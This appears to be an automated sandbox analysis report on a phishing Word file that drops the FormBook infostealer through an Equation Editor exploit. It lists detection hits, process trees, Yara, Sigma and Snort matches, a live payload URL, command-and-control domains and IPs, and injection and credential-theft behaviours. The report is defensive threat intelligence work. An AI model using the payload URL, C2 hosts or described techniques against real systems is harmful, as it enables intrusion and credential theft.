Edit tour

Windows Analysis Report
BASF Purchase Order.doc

Overview

General Information

Sample name:	BASF Purchase Order.doc
Analysis ID:	1450820
MD5:	79b8cf99303217fe4f267ba133e54c1e
SHA1:	32b19642fd76fb71c64bf73cd2ff5bb993a6c0a5
SHA256:	3a332f1b11c8801f0197a99e8a6984c0fe2cafa0a68d75d4779b9e9e875d55e8
Tags:	doc
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected FormBook

.NET source code references suspicious native API functions

Document exploit detected (process start blacklist hit)

Drops PE files with a suspicious file extension

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Microsoft Office Child Process

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches the installation path of Mozilla Firefox

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Screensaver Binary File Creation

Stores large binary data to the registry

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 892 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 652 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

sharon48399.scr (PID: 1964 cmdline: "C:\Users\user\AppData\Roaming\sharon48399.scr" MD5: CBFEE83ADF934845EB949B5449FBBF84)

sharon48399.scr (PID: 2176 cmdline: "C:\Users\user\AppData\Roaming\sharon48399.scr" MD5: CBFEE83ADF934845EB949B5449FBBF84)

sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe (PID: 1980 cmdline: "C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

dfrgui.exe (PID: 1688 cmdline: "C:\Windows\SysWOW64\dfrgui.exe" MD5: FB036244DBD2FADC225AD8650886B641)

sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe (PID: 2580 cmdline: "C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1796 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)

EQNEDT32.EXE (PID: 2944 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
BASF Purchase Order.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x310d:$obj2: \objdata 0x3129:$obj3: \objupdate 0x30e8:$obj6: \objlink

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.878242341.0000000000080000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.878242341.0000000000080000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b3c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1523f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.405827300.0000000000320000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.405827300.0000000000320000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b3c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1523f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ea03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18882:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000E.00000002.481797908.0000000002B60000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000E.00000002.481797908.0000000002B60000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x303b8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1a237:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.878328572.0000000000330000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.878328572.0000000000330000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b3c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1523f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.878421508.00000000004F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.878421508.00000000004F0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e154:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17fd3:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.878315434.00000000002F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.878315434.00000000002F0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b3c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1523f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.362337538.0000000000A80000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6d26b:$x1: In$J$ct0r
00000006.00000002.406051877.0000000000F00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.406051877.0000000000F00000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x544456:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x52e2d5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.878564779.0000000002860000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.878564779.0000000002860000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x544456:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x52e2d5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.sharon48399.scr.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.sharon48399.scr.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dc03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17a82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
6.2.sharon48399.scr.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
6.2.sharon48399.scr.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ea03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x18882:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.sharon48399.scr.a80000.1.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6b46b:$x1: In$J$ct0r
5.2.sharon48399.scr.328a370.5.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6b46b:$x1: In$J$ct0r
5.2.sharon48399.scr.2267b24.3.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa491c:$x1: In$J$ct0r 0xa58e0:$a1: WriteProcessMemory 0xa596c:$a1: WriteProcessMemory 0xa5a40:$a4: VirtualAllocEx 0xa5c64:$a4: VirtualAllocEx 0xa5ce4:$a4: VirtualAllocEx
5.2.sharon48399.scr.a80000.1.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6d26b:$x1: In$J$ct0r
5.2.sharon48399.scr.226a364.4.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0xa20dc:$x1: In$J$ct0r 0xa30a0:$a1: WriteProcessMemory 0xa312c:$a1: WriteProcessMemory 0xa3200:$a4: VirtualAllocEx 0xa3424:$a4: VirtualAllocEx 0xa34a4:$a4: VirtualAllocEx
5.2.sharon48399.scr.328a370.5.raw.unpack	MALWARE_Win_DLInjector02	Detects downloader injector	ditekSHen	0x6d26b:$x1: In$J$ct0r
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 652, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\sharon48399.scr", CommandLine: "C:\Users\user\AppData\Roaming\sharon48399.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\sharon48399.scr, NewProcessName: C:\Users\user\AppData\Roaming\sharon48399.scr, OriginalFileName: C:\Users\user\AppData\Roaming\sharon48399.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 652, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\sharon48399.scr", ProcessId: 1964, ProcessName: sharon48399.scr

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 652, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharon[1].scr

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 652, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharon[1].scr

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 652, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 892, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 66.96.161.166

Timestamp:	06/03/24-08:52:09.561024
SID:	2855465
Source Port:	49162
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 84.33.215.91

Timestamp:	06/03/24-08:55:02.764327
SID:	2855465
Source Port:	49203
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 172.67.182.131

Timestamp:	06/03/24-08:55:16.387997
SID:	2855465
Source Port:	49207
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 183.111.183.31

Timestamp:	06/03/24-08:54:26.931968
SID:	2855465
Source Port:	49195
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 54.38.220.85

Timestamp:	06/03/24-08:52:50.269938
SID:	2855465
Source Port:	49167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 194.9.94.86

Timestamp:	06/03/24-08:53:03.908284
SID:	2855465
Source Port:	49171
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 208.91.197.13

Timestamp:	06/03/24-08:54:49.329012
SID:	2855465
Source Port:	49199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 67.223.117.189

Timestamp:	06/03/24-08:53:59.127894
SID:	2855465
Source Port:	49187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 89.116.109.159

Timestamp:	06/03/24-08:54:12.669840
SID:	2855465
Source Port:	49191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 93.127.187.187

Timestamp:	06/03/24-08:55:29.982644
SID:	2855465
Source Port:	49211
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 183.111.183.31

Timestamp:	06/03/24-08:53:44.963507
SID:	2855465
Source Port:	49183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 198.12.241.35

Timestamp:	06/03/24-08:53:31.078911
SID:	2855465
Source Port:	49179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.22 - Destination IP: 91.195.240.19

Timestamp:	06/03/24-08:53:17.476158
SID:	2855465
Source Port:	49175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: dukeenergyltd.top	Virustotal: Detection: 21%			Perma Link
Source: https://dukeenergyltd.top/sharon.scr	Virustotal: Detection: 22%			Perma Link

Multi AV Scanner detection for submitted file

Source: BASF Purchase Order.doc	Virustotal: Detection: 41%			Perma Link
Source: BASF Purchase Order.doc	ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 6.2.sharon48399.scr.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.sharon48399.scr.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.878242341.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.405827300.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.481797908.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.878328572.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.878421508.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.878315434.00000000002F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.406051877.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.878564779.0000000002860000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 188.114.97.3 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\sharon48399.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\sharon48399.scr			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49161 version: TLS 1.2

Source:	Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: sharon48399.scr, 00000005.00000002.362295596.0000000000660000.00000004.08000000.00040000.00000000.sdmp, sharon48399.scr, 00000005.00000002.362383044.0000000002211000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dfrgui.pdb source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000003.392759553.0000000000220000.00000004.00000001.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000003.392886673.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000002.878300165.000000000030E000.00000002.00000001.01000000.00000009.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878328995.000000000030E000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: dfrgui.pdb2D source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000003.392759553.0000000000220000.00000004.00000001.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000003.392886673.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: sharon48399.scr, sharon48399.scr, 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.405822368.0000000001F50000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.406160748.00000000020B0000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.878528126.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.878528126.0000000002240000.00000040.00001000.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Source: global traffic	DNS query: name: dukeenergyltd.top
Source: global traffic	DNS query: name: www.besthomeincome24.com
Source: global traffic	DNS query: name: www.terelprime.com
Source: global traffic	DNS query: name: www.sqlite.org
Source: global traffic	DNS query: name: www.sqlite.org
Source: global traffic	DNS query: name: www.99b6q.xyz
Source: global traffic	DNS query: name: www.99b6q.xyz
Source: global traffic	DNS query: name: www.99b6q.xyz
Source: global traffic	DNS query: name: www.99b6q.xyz
Source: global traffic	DNS query: name: www.kinkynerdspro.blog
Source: global traffic	DNS query: name: www.xn--matfrmn-jxa4m.se
Source: global traffic	DNS query: name: www.primeplay88.org
Source: global traffic	DNS query: name: www.aceautocorp.com
Source: global traffic	DNS query: name: www.mrart.co.kr
Source: global traffic	DNS query: name: www.touchclean.top
Source: global traffic	DNS query: name: www.ibistradingco.com
Source: global traffic	DNS query: name: www.jnkinteractive.co.kr
Source: global traffic	DNS query: name: www.chrisdomond.com
Source: global traffic	DNS query: name: www.chrisdomond.com
Source: global traffic	DNS query: name: www.chrisdomond.com
Source: global traffic	DNS query: name: www.chrisdomond.com
Source: global traffic	DNS query: name: www.riveramayahousing.com
Source: global traffic	DNS query: name: www.exclaimer342200213.net
Source: global traffic	DNS query: name: www.platinummedia.info
Source: global traffic	DNS query: name: www.elenagilherrero.com
Source: global traffic	DNS query: name: www.besthomeincome24.com

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 66.96.161.166:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.38.220.85:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.9.94.86:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.195.240.19:80
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 198.12.241.35:80
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 183.111.183.31:80
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 67.223.117.189:80
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 89.116.109.159:80
Source: global traffic	TCP traffic: 192.168.2.22:49195 -> 183.111.183.31:80
Source: global traffic	TCP traffic: 192.168.2.22:49199 -> 208.91.197.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49203 -> 84.33.215.91:80
Source: global traffic	TCP traffic: 192.168.2.22:49207 -> 172.67.182.131:80
Source: global traffic	TCP traffic: 192.168.2.22:49211 -> 93.127.187.187:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
